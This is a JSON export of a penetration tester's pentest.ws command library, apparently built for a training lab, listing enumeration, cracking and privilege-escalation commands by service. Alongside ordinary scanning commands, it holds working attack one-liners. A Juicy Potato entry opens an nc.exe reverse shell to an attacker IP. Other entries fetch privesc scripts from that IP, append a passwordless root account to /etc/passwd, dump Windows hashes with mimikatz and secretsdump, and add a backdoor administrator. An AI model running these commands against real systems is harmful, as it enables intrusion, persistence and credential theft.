pentest.ws export
{
"username": "brakertech",
"export_time": "2021-01-28T23:14:25.004Z",
"export_type": "Account Items",
"service_command_library": [
{
"service": "http",
"sort_order": null,
"name": "davtest",
"command": "davtest -url http://$ip:$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dotdotpwn",
"command": "dotdotpwn -m http-url -u http://$ip:$port/TRAVERSAL -k \"root:\"",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "cewl",
"command": "cewl -d 10 -w log.cewl http://$ip",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dirb",
"command": "dirb http://$ip -r -o log.80.dirb",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "dirsearch",
"command": "dirsearch -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 50 -e \",html,php,txt -f --plain-text-report=log.$port.dirsearch -u http://$ip:$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "nikto",
"command": "nikto -host $ip -port $port | tee log.$port.nikto",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "ffuf - RobotsDisallowed",
"command": "ffuf -c -w /usr/share/wordlists/RobotsDisallowed/top10000.txt -u http://$ip/FUZZ",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "OpenDoor",
"command": "cd /opendoor && opendoor --host http://$ip -p $port --scan=directories -t 50 --reports json,html,txt --reports-dir=/root/labs/boxes/$ip/web_$port",
"notes": ""
},
{
"service": "http",
"sort_order": null,
"name": "ffuf - Biglist - FUZZ",
"command": "ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://$ip/FUZZ",
"notes": ""
},
{
"service": "imap",
"sort_order": null,
"name": "rdpscan - bluekeep check",
"command": "rdpscan $ip",
"notes": ""
},
{
"service": "ldap",
"sort_order": null,
"name": "ldap enum",
"command": "ldapsearch -x -h $ip -D 'svcorp\\alice' -w 'ThisIsTheUsersPassword01' -b \"DC=svcorp,DC=com\" > ldap_enum.txt",
"notes": ""
},
{
"service": "mdns",
"sort_order": null,
"name": "mdns zeroconf",
"command": "sudo nmap --script=broadcast-dns-service-discovery -sU -p $port $ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 1,
"name": "mount smb location",
"command": "mount -v -t cifs //$ip/some_folder /mnt/$ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 2,
"name": "enumerate users",
"command": "https://github.com/byt3bl33d3r/CrackMapExec/wiki/SMB-Command-Reference",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 3,
"name": "smbclient",
"command": "smbclient -N -L \\\\\\\\$ip",
"notes": ""
},
{
"service": "microsoft-ds",
"sort_order": 4,
"name": "smbmap",
"command": "smbmap -H $ip -R",
"notes": "recursive directory listing"
},
{
"service": "microsoft-ds",
"sort_order": 5,
"name": "nmap -p 135,139,445 --script smb*",
"command": "mkdir -p /boxes/$ip/$ip_scan 2>/dev/null; nmap -p 135,139,445 --script smb* --script-args=unsafe=1 $ip -oA /boxes/$ip/$ip_scan/$ip_smb_all",
"notes": ""
},
{
"service": "ms-wbt-server",
"sort_order": null,
"name": "rdpscan (BlueKeep)",
"command": "rdpscan $ip",
"notes": "Check for BlueKeep vulnerability"
},
{
"service": "netbios-ssn",
"sort_order": null,
"name": "ngrep Samba version",
"command": "ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'",
"notes": ""
},
{
"service": "netbios-ssn",
"sort_order": null,
"name": "Check samba version",
"command": "smbclient -L $ip -U \"\" -N",
"notes": "in another window run this:\r\nngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'"
},
{
"service": "status",
"sort_order": null,
"name": "rpcinfo",
"command": "rpcinfo $ip",
"notes": ""
}
],
"general_command_library": [
{
"os": "linux",
"category": "cracking",
"sub_category": "kerberos",
"name": "hashcat -kerberos",
"command": "hashcat -a 0 -m 13100 svcorp-kerb.txt pw1.txt",
"notes": ""
},
{
"os": "Linux",
"category": "disk permissions",
"sub_category": "secrets",
"name": "grep for files in /dev",
"command": "grep -R --binary-files=text -B 2 '99999:7' /dev 2>/dev/null",
"notes": ""
},
{
"os": "Linux",
"category": "disk permissions",
"sub_category": "secrets",
"name": "Grep for files on disk",
"command": "grep -R --binary-files=text -B 2 '99999:7' /dev 2>/dev/null",
"notes": ""
},
{
"os": "Linux",
"category": "Enumeration",
"sub_category": "smb",
"name": "cme - shares",
"command": "python3 /usr/local/bin/cme smb 10.11.1.20 -u alice -p 'ThisIsTheUsersPassword01' --shares",
"notes": "crackmapexec"
},
{
"os": "Linux",
"category": "Hashdump",
"sub_category": "Windows",
"name": "cme - mimikatz",
"command": "sudo python3 /usr/local/bin/cme smb 10.11.1.22 -u alice -p 'ThisIsTheUsersPassword01' -M mimikatz",
"notes": ""
},
{
"os": "Linux",
"category": "Hashdump",
"sub_category": "Windows",
"name": "secretsdump",
"command": "/usr/bin/impacket-secretsdump kali:kalikali@10.11.1.13",
"notes": "If you get an error \"RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied\" then run this as admin:\nreg add HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\SYSTEM /V LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "script",
"name": "/etc/passwd - Add root user",
"command": "echo newroot::0:0:root:/root:/bin/bash >> /etc/passwd",
"notes": ""
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "Tools",
"name": "Download Privesc Tools",
"command": "IP=192.168.119.152;curl -O http://$IP/linuxprivchecker.py;curl -O http://$IP/lse.sh;curl -O http://$IP/linpeas.sh;curl -O http://$IP/linenum.sh;curl -O http://$IP/kernelpop.tar.gz;",
"notes": ""
},
{
"os": "Linux",
"category": "privesc",
"sub_category": "Tools",
"name": "linenum",
"command": "chmod +x linenum.sh; mkdir output-linenum; ./linenum.sh -r report -e ./output-linenum -t & 2>/dev/null",
"notes": ""
},
{
"os": "Windows",
"category": "default",
"sub_category": "directory",
"name": "dir",
"command": "dir /b /s /a-d ",
"notes": "show all files"
},
{
"os": "Windows",
"category": "disk permissions",
"sub_category": "Tools",
"name": "accesschk64.exe",
"command": "accesschk64.exe /accepteula -uws \"Everyone\" \"C:\\Program Files\"",
"notes": "ACL permissions"
},
{
"os": "Windows",
"category": "Hashdump",
"sub_category": "Tools",
"name": "GetUserSPNs",
"command": "python3 /pentest/exploitation/impacket/examples/GetUserSPNs.py -request -dc-ip 10.11.1.20 svcorp.com/evan",
"notes": ""
},
{
"os": "Windows",
"category": "post-exploitation",
"sub_category": "meterpreter",
"name": "Meterpreter File Search",
"command": "#Meterpreter\nsearch -f *.txt\nsearch -f *.zip\nsearch -f *.doc\nsearch -f *.xls\nsearch -f config*\nsearch -f *.rar\nsearch -f *.docx\nsearch -f *.sql\n",
"notes": ""
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "Juicy.Potato.x86.exe",
"command": "Juicy.Potato.x86.exe -l 1337 -p c:\\windows\\system32\\cmd.exe -a \"/c c:\\inetpub\\wwwroot\\nc.exe -e cmd.exe 192.168.119.152 4443\" -t * -c \"{659cdea7-489e-11d9-a9cd-000d56965251}\"",
"notes": "c:\\inetpub\\wwwroot>whoami /priv\nwhoami /priv\n\nPRIVILEGES INFORMATION\n----------------------\n\nPrivilege Name Description State\n============================= ========================================= ========\nSeAssignPrimaryTokenPrivilege Replace a process level token Disabled\nSeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled\nSeAuditPrivilege Generate security audits Disabled\nSeChangeNotifyPrivilege Bypass traverse checking Enabled\nSeImpersonatePrivilege Impersonate a client after authentication Enabled\nSeCreateGlobalPrivilege Create global objects Enabled\nSeIncreaseWorkingSetPrivilege Increase a process working set Disabled\n"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "PowerUp",
"command": "powershell.exe -exec bypass -Command \"& {Import-Module .\\PowerUp.ps1; Invoke-AllChecks}\"\npowershell.exe -exec bypass\nImport-Module .\\PowerUp.ps1\nImport-Module .\\Privesc.psd1\nInvoke-AllChecks",
"notes": "cheat sheet\nhttps://h4ck.co/wp-content/uploads/2017/11/PowerUp.pdf"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "windows-privesc-check2",
"command": "windows-privesc-check2.exe --audit -a -o report-disco",
"notes": "auditing, full python shell"
},
{
"os": "Windows",
"category": "privesc",
"sub_category": "Tools",
"name": "winpeas.exe",
"command": "winPEAS32.exe cmd searchall searchfast",
"notes": "REG ADD HKCU\\Console /v VirtualTerminalLevel /t REG_DWORD /d 1"
},
{
"os": "Windows",
"category": "users",
"sub_category": "native_commands",
"name": "Add group",
"command": "net localgroup administrators kali /add",
"notes": ""
},
{
"os": "Windows",
"category": "users",
"sub_category": "native_commands",
"name": "Add User",
"command": "net user kali kalikali /add",
"notes": ""
}
],
"default_service_checklist": null
}